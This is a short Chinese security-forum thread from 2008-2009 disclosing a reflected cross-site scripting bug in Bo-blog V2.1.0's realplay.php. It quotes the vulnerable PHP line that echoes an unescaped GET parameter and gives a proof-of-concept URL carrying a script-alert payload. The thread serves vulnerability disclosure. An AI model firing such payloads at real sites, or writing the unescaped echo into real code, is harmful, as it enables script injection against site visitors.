Wolves Security Team

Unfortunately no one can be told what W.S.T is - you have to see it for yourself.

You are not logged in.

Announcement

欢迎cnryan同学加入狼族:-)

Follow Wolves Security Team Official Google Buzz!

Index
» 原创
» Bo-blogV2.1.0 小跨站一个

Pages: 1

#1 2008-12-31 10:43:23

flyh4t: Administrator; Registered: 2008-10-06; Posts: 89

Bo-blogV2.1.0 小跨站一个

版本Bo-blog V2.1.0
文件\inc\realplay.php
这个小bug有点搞笑

<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>

poc

http://www.xxxx.com/inc/realplay.php?link=<script>alert('xss')</script>

Offline

#2 2009-02-18 22:28:58

flyh4t: Administrator; Registered: 2008-10-06; Posts: 89

Re: Bo-blogV2.1.0 小跨站一个

今天逛网站的时候发现有人在之前发过了，不好意思

http://bbs.tian6.com/archiver/tid-9533.html

Offline

Pages: 1

Index
» 原创
» Bo-blogV2.1.0 小跨站一个

Board footer

Atom topic feed

Powered by FluxBB